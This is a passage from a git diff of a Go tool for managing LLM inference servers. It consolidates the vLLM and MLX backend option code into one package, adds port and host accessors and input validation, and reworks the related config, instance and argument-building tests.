!= nil { + tt.validate(t, result) + } + }) + } +} + +func TestMlxBuildCommandArgs_BooleanFields(t *testing.T) { + tests := []struct { + name string + options backends.MlxServerOptions + expected []string + excluded []string + }{ + { + name: "trust_remote_code true", + options: backends.MlxServerOptions{ + TrustRemoteCode: true, + }, + expected: []string{"--trust-remote-code"}, + }, + { + name: "trust_remote_code false", + options: backends.MlxServerOptions{ + TrustRemoteCode: false, + }, + excluded: []string{"--trust-remote-code"}, + }, + { + name: "multiple booleans", + options: backends.MlxServerOptions{ + TrustRemoteCode: true, + UseDefaultChatTemplate: true, + }, + expected: []string{"--trust-remote-code", "--use-default-chat-template"}, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + args := tt.options.BuildCommandArgs() + + for _, expectedArg := range tt.expected { + if !testutil.Contains(args, expectedArg) { + t.Errorf("Expected argument %q not found in %v", expectedArg, args) + } + } + + for _, excludedArg := range tt.excluded { + if testutil.Contains(args, excludedArg) { + t.Errorf("Excluded argument %q found in %v", excludedArg, args) + } + } + }) + } +} + +func TestMlxBuildCommandArgs_ZeroValues(t *testing.T) { + options := backends.MlxServerOptions{ + Port: 0, // Should be excluded + TopK: 0, // Should be excluded + Temp: 0, // Should be excluded + Model: "", // Should be excluded + LogLevel: "", // Should be excluded + TrustRemoteCode: false, // Should be excluded + } + + args := options.BuildCommandArgs() + + // Zero values should not appear in arguments + excludedArgs := []string{ + "--port", "0", + "--top-k", "0", + "--temp", "0", + "--model", "", + "--log-level", "", + "--trust-remote-code", + } + + for _, excludedArg := range excludedArgs { + if testutil.Contains(args, excludedArg) { + t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args) + } + } +} \ No newline at end of file diff --git a/pkg/backends/vllm/vllm.go b/pkg/backends/vllm.go similarity index 90% rename from pkg/backends/vllm/vllm.go rename to pkg/backends/vllm.go index d4fee25..857eab3 100644 --- a/pkg/backends/vllm/vllm.go +++ b/pkg/backends/vllm.go @@ -1,11 +1,12 @@ -package vllm +package backends import ( - "llamactl/pkg/backends" + "fmt" + "llamactl/pkg/validation" ) -// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated -var multiValuedFlags = map[string]bool{ +// vllmMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated +var vllmMultiValuedFlags = map[string]bool{ "api-key": true, "allowed-origins": true, "allowed-methods": true, @@ -139,6 +140,36 @@ type VllmServerOptions struct { OverrideKVCacheALIGNSize int `json:"override_kv_cache_align_size,omitempty"` } +func (o *VllmServerOptions) GetPort() int { + return o.Port +} + +func (o *VllmServerOptions) SetPort(port int) { + o.Port = port +} + +func (o *VllmServerOptions) GetHost() string { + return o.Host +} + +func (o *VllmServerOptions) Validate() error { + if o == nil { + return validation.ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend")) + } + + // Use reflection to check all string fields for injection patterns + if err := validation.ValidateStructStrings(o, ""); err != nil { + return err + } + + // Basic network validation for port + if o.Port < 0 || o.Port > 65535 { + return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port)) + } + + return nil +} + // BuildCommandArgs converts VllmServerOptions to command line arguments // For vLLM native, model is a positional argument after "serve" func (o *VllmServerOptions) BuildCommandArgs() []string { @@ -155,7 +186,7 @@ func (o *VllmServerOptions) BuildCommandArgs() []string { // Use package-level multipleFlags variable - flagArgs := backends.BuildCommandArgs(&optionsCopy, multiValuedFlags) + flagArgs := BuildCommandArgs(&optionsCopy, vllmMultiValuedFlags) args = append(args, flagArgs...) return args @@ -165,7 +196,7 @@ func (o *VllmServerOptions) BuildDockerArgs() []string { var args []string // Use package-level multipleFlags variable - flagArgs := backends.BuildCommandArgs(o, multiValuedFlags) + flagArgs := BuildCommandArgs(o, vllmMultiValuedFlags) args = append(args, flagArgs...) return args @@ -192,7 +223,7 @@ func ParseVllmCommand(command string) (*VllmServerOptions, error) { } var vllmOptions VllmServerOptions - if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil { + if err := ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil { return nil, err } diff --git a/pkg/backends/vllm/vllm_test.go b/pkg/backends/vllm/vllm_test.go deleted file mode 100644 index ea13496..0000000 --- a/pkg/backends/vllm/vllm_test.go +++ /dev/null @@ -1,153 +0,0 @@ -package vllm_test - -import ( - "llamactl/pkg/backends/vllm" - "slices" - "testing" -) - -func TestParseVllmCommand(t *testing.T) { - tests := []struct { - name string - command string - expectErr bool - }{ - { - name: "basic vllm serve command", - command: "vllm serve microsoft/DialoGPT-medium", - expectErr: false, - }, - { - name: "serve only command", - command: "serve microsoft/DialoGPT-medium", - expectErr: false, - }, - { - name: "positional model with flags", - command: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2", - expectErr: false, - }, - { - name: "model with path", - command: "vllm serve /path/to/model --gpu-memory-utilization 0.8", - expectErr: false, - }, - { - name: "empty command", - command: "", - expectErr: true, - }, - { - name: "unterminated quote", - command: `vllm serve "unterminated`, - expectErr: true, - }, - } - - for _, tt := range tests { - t.Run(tt.name, func(t *testing.T) { - result, err := vllm.ParseVllmCommand(tt.command) - - if tt.expectErr { - if err == nil { - t.Errorf("expected error but got none") - } - return - } - - if err != nil { - t.Errorf("unexpected error: %v", err) - return - } - - if result == nil { - t.Errorf("expected result but got nil") - } - }) - } -} - -func TestParseVllmCommandValues(t *testing.T) { - command := "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs" - result, err := vllm.ParseVllmCommand(command) - - if err != nil { - t.Fatalf("unexpected error: %v", err) - } - - if result.Model != "test-model" { - t.Errorf("expected model 'test-model', got '%s'", result.Model) - } - if result.TensorParallelSize != 4 { - t.Errorf("expected tensor_parallel_size 4, got %d", result.TensorParallelSize) - } - if result.GPUMemoryUtilization != 0.8 { - t.Errorf("expected gpu_memory_utilization 0.8, got %f", result.GPUMemoryUtilization) - } - if !result.EnableLogOutputs { - t.Errorf("expected enable_log_outputs true, got %v", result.EnableLogOutputs) - } -} - -func TestBuildCommandArgs(t *testing.T) { - options := vllm.VllmServerOptions{ - Model: "microsoft/DialoGPT-medium", - Port: 8080, - Host: "localhost", - TensorParallelSize: 2, - GPUMemoryUtilization: 0.8, - EnableLogOutputs: true, - AllowedOrigins: []string{"http://localhost:3000", "https://example.com"}, - } - - args := options.BuildCommandArgs() - - // Check that model is the first positional argument (not a --model flag) - if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" { - t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args) - } - - // Check that --model flag is NOT present (since model should be positional) - if contains(args, "--model") { - t.Errorf("Found --model flag, but model should be positional argument in args: %v", args) - } - - // Check other flags - if !containsFlagWithValue(args, "--tensor-parallel-size", "2") { - t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args) - } - if !contains(args, "--enable-log-outputs") { - t.Errorf("Expected --enable-log-outputs not found in %v", args) - } - if !contains(args, "--host") { - t.Errorf("Expected --host not found in %v", args) - } - if !contains(args, "--port") { - t.Errorf("Expected --port not found in %v", args) - } - - // Check array handling (multiple flags) - allowedOriginsCount := 0 - for i := range args { - if args[i] == "--allowed-origins" { - allowedOriginsCount++ - } - } - if allowedOriginsCount != 2 { - t.Errorf("Expected 2 --allowed-origins flags, got %d", allowedOriginsCount) - } -} - -// Helper functions -func contains(slice []string, item string) bool { - return slices.Contains(slice, item) -} - -func containsFlagWithValue(args []string, flag, value string) bool { - for i, arg := range args { - if arg == flag && i+1 < len(args) && args[i+1] == value { - return true - } - } - return false -} diff --git a/pkg/backends/vllm_test.go b/pkg/backends/vllm_test.go new file mode 100644 index 0000000..b9e6a13 --- /dev/null +++ b/pkg/backends/vllm_test.go @@ -0,0 +1,286 @@ +package backends_test + +import ( + "llamactl/pkg/backends" + "llamactl/pkg/testutil" + "testing" +) + +func TestParseVllmCommand(t *testing.T) { + tests := []struct { + name string + command string + expectErr bool + validate func(*testing.T, *backends.VllmServerOptions) + }{ + { + name: "basic vllm serve command", + command: "vllm serve microsoft/DialoGPT-medium", + expectErr: false, + validate: func(t *testing.T, opts *backends.VllmServerOptions) { + if opts.Model != "microsoft/DialoGPT-medium" { + t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model) + } + }, + }, + { + name: "serve only command", + command: "serve microsoft/DialoGPT-medium", + expectErr: false, + validate: func(t *testing.T, opts *backends.VllmServerOptions) { + if opts.Model != "microsoft/DialoGPT-medium" { + t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model) + } + }, + }, + { + name: "positional model with flags", + command: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2", + expectErr: false, + validate: func(t *testing.T, opts *backends.VllmServerOptions) { + if opts.Model != "microsoft/DialoGPT-medium" { + t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model) + } + if opts.TensorParallelSize != 2 { + t.Errorf("expected tensor_parallel_size 2, got %d", opts.TensorParallelSize) + } + }, + }, + { + name: "model with path", + command: "vllm serve /path/to/model --gpu-memory-utilization 0.8", + expectErr: false, + validate: func(t *testing.T, opts *backends.VllmServerOptions) { + if opts.Model != "/path/to/model" { + t.Errorf("expected model '/path/to/model', got '%s'", opts.Model) + } + if opts.GPUMemoryUtilization != 0.8 { + t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization) + } + }, + }, + { + name: "multiple value types", + command: "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs", + expectErr: false, + validate: func(t *testing.T, opts *backends.VllmServerOptions) { + if opts.Model != "test-model" { + t.Errorf("expected model 'test-model', got '%s'", opts.Model) + } + if opts.TensorParallelSize != 4 { + t.Errorf("expected tensor_parallel_size 4, got %d", opts.TensorParallelSize) + } + if opts.GPUMemoryUtilization != 0.8 { + t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization) + } + if !opts.EnableLogOutputs { + t.Errorf("expected enable_log_outputs true, got %v", opts.EnableLogOutputs) + } + }, + }, + { + name: "empty command", + command: "", + expectErr: true, + }, + { + name: "unterminated quote", + command: `vllm serve "unterminated`, + expectErr: true, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + result, err := backends.ParseVllmCommand(tt.command) + + if tt.expectErr { + if err == nil { + t.Errorf("expected error but got none") + } + return + } + + if err != nil { + t.Errorf("unexpected error: %v", err) + return + } + + if result == nil { + t.Errorf("expected result but got nil") + return + } + + if tt.validate != nil { + tt.validate(t, result) + } + }) + } +} + +func TestVllmBuildCommandArgs_BooleanFields(t *testing.T) { + tests := []struct { + name string + options backends.VllmServerOptions + expected []string + excluded []string + }{ + { + name: "enable_log_outputs true", + options: backends.VllmServerOptions{ + EnableLogOutputs: true, + }, + expected: []string{"--enable-log-outputs"}, + }, + { + name: "enable_log_outputs false", + options: backends.VllmServerOptions{ + EnableLogOutputs: false, + }, + excluded: []string{"--enable-log-outputs"}, + }, + { + name: "multiple booleans", + options: backends.VllmServerOptions{ + EnableLogOutputs: true, + TrustRemoteCode: true, + EnablePrefixCaching: true, + DisableLogStats: false, + }, + expected: []string{"--enable-log-outputs", "--trust-remote-code", "--enable-prefix-caching"}, + excluded: []string{"--disable-log-stats"}, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + args := tt.options.BuildCommandArgs() + + for _, expectedArg := range tt.expected { + if !testutil.Contains(args, expectedArg) { + t.Errorf("Expected argument %q not found in %v", expectedArg, args) + } + } + + for _, excludedArg := range tt.excluded { + if testutil.Contains(args, excludedArg) { + t.Errorf("Excluded argument %q found in %v", excludedArg, args) + } + } + }) + } +} + +func TestVllmBuildCommandArgs_ZeroValues(t *testing.T) { + options := backends.VllmServerOptions{ + Port: 0, // Should be excluded + TensorParallelSize: 0, // Should be excluded + GPUMemoryUtilization: 0, // Should be excluded + Model: "", // Should be excluded (positional arg) + Host: "", // Should be excluded + EnableLogOutputs: false, // Should be excluded + } + + args := options.BuildCommandArgs() + + // Zero values should not appear in arguments + excludedArgs := []string{ + "--port", "0", + "--tensor-parallel-size", "0", + "--gpu-memory-utilization", "0", + "--host", "", + "--enable-log-outputs", + } + + for _, excludedArg := range excludedArgs { + if testutil.Contains(args, excludedArg) { + t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args) + } + } + + // Model should not be present as positional arg when empty + if len(args) > 0 && args[0] == "" { + t.Errorf("Empty model should not be present as positional argument") + } +} + +func TestVllmBuildCommandArgs_ArrayFields(t *testing.T) { + options := backends.VllmServerOptions{ + AllowedOrigins: []string{"http://localhost:3000", "https://example.com"}, + AllowedMethods: []string{"GET", "POST"}, + Middleware: []string{"middleware1", "middleware2", "middleware3"}, + } + + args := options.BuildCommandArgs() + + // Check that each array value appears with its flag + expectedOccurrences := map[string][]string{ + "--allowed-origins": {"http://localhost:3000", "https://example.com"}, + "--allowed-methods": {"GET", "POST"}, + "--middleware": {"middleware1", "middleware2", "middleware3"}, + } + + for flag, values := range expectedOccurrences { + for _, value := range values { + if !testutil.ContainsFlagWithValue(args, flag, value) { + t.Errorf("Expected %s %s, not found in %v", flag, value, args) + } + } + } +} + +func TestVllmBuildCommandArgs_EmptyArrays(t *testing.T) { + options := backends.VllmServerOptions{ + AllowedOrigins: []string{}, // Empty array should not generate args + Middleware: []string{}, // Empty array should not generate args + } + + args := options.BuildCommandArgs() + + excludedArgs := []string{"--allowed-origins", "--middleware"} + for _, excludedArg := range excludedArgs { + if testutil.Contains(args, excludedArg) { + t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args) + } + } +} + +func TestVllmBuildCommandArgs_PositionalModel(t *testing.T) { + options := backends.VllmServerOptions{ + Model: "microsoft/DialoGPT-medium", + Port: 8080, + Host: "localhost", + TensorParallelSize: 2, + GPUMemoryUtilization: 0.8, + EnableLogOutputs: true, + } + + args := options.BuildCommandArgs() + + // Check that model is the first positional argument (not a --model flag) + if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" { + t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args) + } + + // Check that --model flag is NOT present (since model should be positional) + if testutil.Contains(args, "--model") { + t.Errorf("Found --model flag, but model should be positional argument in args: %v", args) + } + + // Check other flags + if !testutil.ContainsFlagWithValue(args, "--tensor-parallel-size", "2") { + t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args) + } + if !testutil.ContainsFlagWithValue(args, "--gpu-memory-utilization", "0.8") { + t.Errorf("Expected --gpu-memory-utilization 0.8 not found in %v", args) + } + if !testutil.Contains(args, "--enable-log-outputs") { + t.Errorf("Expected --enable-log-outputs not found in %v", args) + } + if !testutil.ContainsFlagWithValue(args, "--host", "localhost") { + t.Errorf("Expected --host localhost not found in %v", args) + } + if !testutil.ContainsFlagWithValue(args, "--port", "8080") { + t.Errorf("Expected --port 8080 not found in %v", args) + } +} diff --git a/pkg/config/config.go b/pkg/config/config.go index d6ee420..517a3c3 100644 --- a/pkg/config/config.go +++ b/pkg/config/config.go @@ -150,9 +150,7 @@ func LoadConfig(configPath string) (AppConfig, error) { EnableSwagger: false, }, LocalNode: "main", - Nodes: map[string]NodeConfig{ - "main": {}, // Local node with empty config - }, + Nodes: map[string]NodeConfig{}, Backends: BackendConfig{ LlamaCpp: BackendSettings{ Command: "llama-server", @@ -217,6 +215,11 @@ func LoadConfig(configPath string) (AppConfig, error) { return cfg, err } + // If local node is not defined in nodes, add it with default config + if _, ok := cfg.Nodes[cfg.LocalNode]; !ok { + cfg.Nodes[cfg.LocalNode] = NodeConfig{} + } + // 3. Override with environment variables loadEnvVars(&cfg) @@ -601,17 +604,3 @@ func getDefaultConfigLocations() []string { return locations } - -// GetBackendSettings resolves backend settings -func (bc *BackendConfig) GetBackendSettings(backendType string) BackendSettings { - switch backendType { - case "llama-cpp": - return bc.LlamaCpp - case "vllm": - return bc.VLLM - case "mlx": - return bc.MLX - default: - return BackendSettings{} - } -} diff --git a/pkg/config/config_test.go b/pkg/config/config_test.go index 964708e..5be2199 100644 --- a/pkg/config/config_test.go +++ b/pkg/config/config_test.go @@ -7,6 +7,20 @@ import ( "testing" ) +// GetBackendSettings resolves backend settings +func getBackendSettings(bc *config.BackendConfig, backendType string) config.BackendSettings { + switch backendType { + case "llama-cpp": + return bc.LlamaCpp + case "vllm": + return bc.VLLM + case "mlx": + return bc.MLX + default: + return config.BackendSettings{} + } +} + func TestLoadConfig_Defaults(t *testing.T) { // Test loading config when no file exists and no env vars set cfg, err := config.LoadConfig("nonexistent-file.yaml") @@ -205,29 +219,6 @@ instances: } } -func TestLoadConfig_InvalidYAML(t *testing.T) { - // Create a temporary config file with invalid YAML - tempDir := t.TempDir() - configFile := filepath.Join(tempDir, "invalid-config.yaml") - - invalidContent := ` -server: - host: "localhost" - port: not-a-number -instances: - [invalid yaml structure -` - - err := os.WriteFile(configFile, []byte(invalidContent), 0644) - if err != nil { - t.Fatalf("Failed to write test config file: %v", err) - } - - _, err = config.LoadConfig(configFile) - if err == nil { - t.Error("Expected LoadConfig to return error for invalid YAML") - } -} func TestParsePortRange(t *testing.T) { tests := []struct { @@ -257,97 +248,6 @@ func TestParsePortRange(t *testing.T) { } } -// Remove the getDefaultConfigLocations test entirely - -func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) { - // Test that environment variables are properly converted to correct types - testCases := []struct { - envVar string - envValue string - checkFn func(*config.AppConfig) bool - desc string - }{ - { - envVar: "LLAMACTL_PORT", - envValue: "invalid-port", - checkFn: func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default - desc: "invalid port number should keep default", - }, - { - envVar: "LLAMACTL_MAX_INSTANCES", - envValue: "not-a-number", - checkFn: func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default - desc: "invalid max instances should keep default", - }, - { - envVar: "LLAMACTL_DEFAULT_AUTO_RESTART", - envValue: "invalid-bool", - checkFn: func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default - desc: "invalid boolean should keep default", - }, - { - envVar: "LLAMACTL_INSTANCE_PORT_RANGE", - envValue: "invalid-range", - checkFn: func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default - desc: "invalid port range should keep default", - }, - } - - for _, tc := range testCases { - t.Run(tc.desc, func(t *testing.T) { - os.Setenv(tc.envVar, tc.envValue) - defer os.Unsetenv(tc.envVar) - - cfg, err := config.LoadConfig("nonexistent-file.yaml") - if err != nil { - t.Fatalf("LoadConfig failed: %v", err) - } - - if !tc.checkFn(&cfg) { - t.Errorf("Test failed: %s", tc.desc) - } - }) - } -} - -func TestLoadConfig_PartialFile(t *testing.T) { - // Test that partial config files work correctly (missing sections should use defaults) - tempDir := t.TempDir() - configFile := filepath.Join(tempDir, "partial-config.yaml") - - // Only specify server config, instances should use defaults - configContent := ` -server: - host: "partial-host" - port: 7777 -` - - err := os.WriteFile(configFile, []byte(configContent), 0644) - if err != nil { - t.Fatalf("Failed to write test config file: %v", err) - } - - cfg, err := config.LoadConfig(configFile) - if err != nil { - t.Fatalf("LoadConfig failed: %v", err) - } - - // Server config should be from file - if cfg.Server.Host != "partial-host" { - t.Errorf("Expected host 'partial-host', got %q", cfg.Server.Host) - } - if cfg.Server.Port != 7777 { - t.Errorf("Expected port 7777, got %d", cfg.Server.Port) - } - - // Instances config should be defaults - if cfg.Instances.PortRange != [2]int{8000, 9000} { - t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange) - } - if cfg.Instances.MaxInstances != -1 { - t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances) - } -} func TestGetBackendSettings_NewStructuredConfig(t *testing.T) { bc := &config.BackendConfig{ @@ -372,7 +272,7 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) { } // Test llama-cpp with Docker - settings := bc.GetBackendSettings("llama-cpp") + settings := getBackendSettings(bc, "llama-cpp") if settings.Command != "custom-llama" { t.Errorf("Expected command 'custom-llama', got %q", settings.Command) } @@ -387,7 +287,7 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) { } // Test vLLM without Docker - settings = bc.GetBackendSettings("vllm") + settings = getBackendSettings(bc, "vllm") if settings.Command != "custom-vllm" { t.Errorf("Expected command 'custom-vllm', got %q", settings.Command) } @@ -399,33 +299,12 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) { } // Test MLX - settings = bc.GetBackendSettings("mlx") + settings = getBackendSettings(bc, "mlx") if settings.Command != "custom-mlx" { t.Errorf("Expected command 'custom-mlx', got %q", settings.Command) } } -func TestGetBackendSettings_EmptyConfig(t *testing.T) { - bc := &config.BackendConfig{} - - // Test empty llama-cpp - settings := bc.GetBackendSettings("llama-cpp") - if settings.Command != "" { - t.Errorf("Expected empty command, got %q", settings.Command) - } - - // Test empty vLLM - settings = bc.GetBackendSettings("vllm") - if settings.Command != "" { - t.Errorf("Expected empty command, got %q", settings.Command) - } - - // Test empty MLX - settings = bc.GetBackendSettings("mlx") - if settings.Command != "" { - t.Errorf("Expected empty command, got %q", settings.Command) - } -} func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) { // Test that backend environment variables work correctly @@ -496,20 +375,6 @@ func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) { } } -func TestGetBackendSettings_InvalidBackendType(t *testing.T) { - bc := &config.BackendConfig{ - LlamaCpp: config.BackendSettings{ - Command: "llama-server", - Args: []string{}, - }, - } - - // Test invalid backend type returns empty settings - settings := bc.GetBackendSettings("invalid-backend") - if settings.Command != "" { - t.Errorf("Expected empty command for invalid backend, got %q", settings.Command) - } -} func TestLoadConfig_LocalNode(t *testing.T) { t.Run("default local node", func(t *testing.T) { @@ -552,8 +417,8 @@ nodes: } // Verify nodes map (includes default "main" + worker1 + worker2) - if len(cfg.Nodes) != 3 { - t.Errorf("Expected 3 nodes (default main + worker1 + worker2), got %d", len(cfg.Nodes)) + if len(cfg.Nodes) != 2 { + t.Errorf("Expected 2 nodes (default worker1 + worker2), got %d", len(cfg.Nodes)) } // Verify local node exists and is empty @@ -579,8 +444,8 @@ nodes: // Verify default main node still exists _, exists = cfg.Nodes["main"] - if !exists { - t.Error("Expected default 'main' node to still exist in nodes map") + if exists { + t.Error("Default 'main' node should not exist when local_node is overridden") } }) @@ -612,8 +477,8 @@ nodes: } // Verify nodes map includes default "main" + primary + worker1 - if len(cfg.Nodes) != 3 { - t.Errorf("Expected 3 nodes (default main + primary + worker1), got %d", len(cfg.Nodes)) + if len(cfg.Nodes) != 2 { + t.Errorf("Expected 2 nodes (primary + worker1), got %d", len(cfg.Nodes)) } localNode, exists := cfg.Nodes["primary"] diff --git a/pkg/instance/instance.go b/pkg/instance/instance.go index ee6757d..762d49e 100644 --- a/pkg/instance/instance.go +++ b/pkg/instance/instance.go @@ -3,7 +3,6 @@ package instance import ( "encoding/json" "fmt" - "llamactl/pkg/backends" "llamactl/pkg/config" "log" "net/http/httputil" @@ -124,48 +123,6 @@ func (i *Instance) IsRunning() bool { return i.status.isRunning() } -func (i *Instance) GetPort() int { - opts := i.GetOptions() - if opts != nil { - switch opts.BackendType { - case backends.BackendTypeLlamaCpp: - if opts.LlamaServerOptions != nil { - return opts.LlamaServerOptions.Port - } - case backends.BackendTypeMlxLm: - if opts.MlxServerOptions != nil { - return opts.MlxServerOptions.Port - } - case backends.BackendTypeVllm: - if opts.VllmServerOptions != nil { - return opts.VllmServerOptions.Port - } - } - } - return 0 -} - -func (i *Instance) GetHost() string { - opts := i.GetOptions() - if opts != nil { - switch opts.BackendType { - case backends.BackendTypeLlamaCpp: - if opts.LlamaServerOptions != nil { - return opts.LlamaServerOptions.Host - } - case backends.BackendTypeMlxLm: - if opts.MlxServerOptions != nil { - return opts.MlxServerOptions.Host - } - case backends.BackendTypeVllm: - if opts.VllmServerOptions != nil { - return opts.VllmServerOptions.Host - } - } - } - return "" -} - // SetOptions sets the options func (i *Instance) SetOptions(opts *Options) { if opts == nil { @@ -198,6 +155,20 @@ func (i *Instance) SetTimeProvider(tp TimeProvider) { } } +func (i *Instance) GetHost() string { + if i.options == nil { + return "localhost" + } + return i.options.GetHost() +} + +func (i *Instance) GetPort() int { + if i.options == nil { + return 0 + } + return i.options.GetPort() +} + // GetProxy returns the reverse proxy for this instance func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) { if i.proxy == nil { @@ -266,39 +237,31 @@ func (i *Instance) ShouldTimeout() bool { return i.proxy.shouldTimeout() } -// getBackendHostPort extracts the host and port from instance options -// Returns the configured host and port for the backend -func (i *Instance) getBackendHostPort() (string, int) { +func (i *Instance) getCommand() string { opts := i.GetOptions() if opts == nil { - return "localhost", 0 + return "" } - var host string - var port int - switch opts.BackendType { - case backends.BackendTypeLlamaCpp: - if opts.LlamaServerOptions != nil { - host = opts.LlamaServerOptions.Host - port = opts.LlamaServerOptions.Port - } - case backends.BackendTypeMlxLm: - if opts.MlxServerOptions != nil { - host = opts.MlxServerOptions.Host - port = opts.MlxServerOptions.Port - } - case backends.BackendTypeVllm: - if opts.VllmServerOptions != nil { - host = opts.VllmServerOptions.Host - port = opts.VllmServerOptions.Port - } + return opts.BackendOptions.GetCommand(i.globalBackendSettings) +} + +func (i *Instance) buildCommandArgs() []string { + opts := i.GetOptions() + if opts == nil { + return nil } - if host == "" { - host = "localhost" + return opts.BackendOptions.BuildCommandArgs(i.globalBackendSettings) +} + +func (i *Instance) buildEnvironment() map[string]string { + opts := i.GetOptions() + if opts == nil { + return nil } - return host, port + return opts.BackendOptions.BuildEnvironment(i.globalBackendSettings, opts.Environment) } // MarshalJSON implements json.Marshaler for Instance @@ -307,21 +270,7 @@ func (i *Instance) MarshalJSON() ([]byte, error) { opts := i.GetOptions() // Determine if docker is enabled for this instance's backend - var dockerEnabled bool - if opts != nil { - switch opts.BackendType { - case backends.BackendTypeLlamaCpp: - if i.globalBackendSettings != nil && i.globalBackendSettings.LlamaCpp.Docker != nil && i.globalBackendSettings.LlamaCpp.Docker.Enabled { - dockerEnabled = true - } - case backends.BackendTypeVllm: - if i.globalBackendSettings != nil && i.globalBackendSettings.VLLM.Docker != nil && i.globalBackendSettings.VLLM.Docker.Enabled { - dockerEnabled = true - } - case backends.BackendTypeMlxLm: - // MLX does not support docker currently - } - } + dockerEnabled := opts.BackendOptions.IsDockerEnabled(i.globalBackendSettings) return json.Marshal(&struct { Name string `json:"name"` diff --git a/pkg/instance/instance_test.go b/pkg/instance/instance_test.go index 375c210..2654f8c 100644 --- a/pkg/instance/instance_test.go +++ b/pkg/instance/instance_test.go @@ -3,7 +3,6 @@ package instance_test import ( "encoding/json" "llamactl/pkg/backends" - "llamactl/pkg/backends/llamacpp" "llamactl/pkg/config" "llamactl/pkg/instance" "llamactl/pkg/testutil" @@ -35,10 +34,12 @@ func TestNewInstance(t *testing.T) { } options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, }, } @@ -56,8 +57,8 @@ func TestNewInstance(t *testing.T) { // Check that options were properly set with defaults applied opts := inst.GetOptions() - if opts.LlamaServerOptions.Model != "/path/to/model.gguf" { - t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model) + if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" { + t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model) } if inst.GetPort() != 8080 { t.Errorf("Expected port 8080, got %d", inst.GetPort()) @@ -73,61 +74,29 @@ func TestNewInstance(t *testing.T) { if opts.RestartDelay == nil || *opts.RestartDelay != 5 { t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay) } -} -func TestNewInstance_WithRestartOptions(t *testing.T) { - backendConfig := &config.BackendConfig{ - LlamaCpp: config.BackendSettings{ - Command: "llama-server", - Args: []string{}, - }, - MLX: config.BackendSettings{ - Command: "mlx_lm.server", - Args: []string{}, - }, - VLLM: config.BackendSettings{ - Command: "vllm", - Args: []string{"serve"}, - }, - } - - globalSettings := &config.InstancesConfig{ - LogsDir: "/tmp/test", - DefaultAutoRestart: true, - DefaultMaxRestarts: 3, - DefaultRestartDelay: 5, - } - - // Override some defaults + // Test that explicit values override defaults autoRestart := false maxRestarts := 10 - restartDelay := 15 - - options := &instance.Options{ + optionsWithOverrides := &instance.Options{ AutoRestart: &autoRestart, MaxRestarts: &maxRestarts, - RestartDelay: &restartDelay, - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } - // Mock onStatusChange function - mockOnStatusChange := func(oldStatus, newStatus instance.Status) {} + inst2 := instance.New("test-override", backendConfig, globalSettings, optionsWithOverrides, "main", mockOnStatusChange) + opts2 := inst2.GetOptions() - instance := instance.New("test-instance", backendConfig, globalSettings, options, "main", mockOnStatusChange) - opts := instance.GetOptions() - - // Check that explicit values override defaults - if opts.AutoRestart == nil || *opts.AutoRestart { + if opts2.AutoRestart == nil || *opts2.AutoRestart { t.Error("Expected AutoRestart to be false (overridden)") } - if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 { - t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts) - } - if opts.RestartDelay == nil || 